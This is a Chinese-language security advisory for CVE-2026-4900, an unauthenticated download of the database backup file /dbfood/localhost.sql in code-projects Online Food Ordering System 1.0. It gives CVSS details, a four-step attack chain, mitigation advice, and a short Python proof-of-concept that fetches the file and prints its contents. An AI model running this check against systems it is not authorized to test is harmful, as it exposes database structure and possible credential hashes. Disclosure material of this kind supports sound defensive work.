CVE-2026-4900 CVSS 5.3 中危

CVE-2026-4900 在线订餐系统敏感信息泄露

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4900

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Food Ordering System

漏洞概述

该漏洞存在于code-projects Online Food Ordering System 1.0中。由于系统对敏感文件配置不当，攻击者无需认证即可远程访问/dbfood/localhost.sql文件。该文件包含敏感的数据库结构或数据，导致信息泄露。目前已有公开的利用代码，风险较高，建议尽快修复配置。

技术细节

该漏洞源于code-projects Online Food Ordering System 1.0在部署时的安全配置疏忽。系统将包含数据库结构及初始数据的SQL备份文件（localhost.sql）放置在Web可访问的目录/dbfood/下。根据CVSS向量AV:N/AC:L/PR:N/UI:N/S:U，该漏洞利用难度极低，攻击者无需任何权限或用户交互，仅需通过网络即可发起攻击。当攻击者发现目标站点存在该路径时，通过发送简单的HTTP GET请求即可下载该文件。这种敏感信息泄露不仅暴露了数据库表结构，还可能包含管理员密码哈希或测试数据，严重威胁系统安全，攻击者可利用这些信息进行后续的撞库攻击或入侵数据库服务器。

攻击链分析

STEP 1

信息收集

攻击者识别出目标站点使用的是code-projects Online Food Ordering System 1.0，并探测其目录结构。

STEP 2

漏洞利用

攻击者直接向服务器发送针对/dbfood/localhost.sql文件的HTTP GET请求，无需绕过任何认证机制。

STEP 3

信息获取

服务器响应请求，返回了localhost.sql文件的内容。攻击者下载并分析该文件，获取数据库表结构和敏感数据。

STEP 4

后续攻击

利用获取的数据库凭证或结构信息，攻击者尝试登录数据库或应用程序后台，进行进一步的提权或数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url):
    # Path to the sensitive SQL file
    vuln_path = "/dbfood/localhost.sql"
    full_url = target_url + vuln_path
    
    try:
        response = requests.get(full_url, timeout=5)
        # Check if the file is accessible
        if response.status_code == 200 and "CREATE TABLE" in response.text:
            print(f"[+] Vulnerability Found! SQL file leaked at: {full_url}")
            print(f"[+] Content preview: {response.text[:200]}...")
        else:
            print(f"[-] Vulnerability not found or file not accessible.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    check_vulnerability(target)

影响范围

code-projects Online Food Ordering System 1.0

防御指南

临时缓解措施

建议立即排查服务器文件系统，删除或移动/dbfood/目录下的localhost.sql及其他敏感备份文件。同时，在Web服务器配置文件中添加规则，拒绝外部对数据库备份文件的直接访问请求，并定期审计目录结构以确保无敏感文件泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表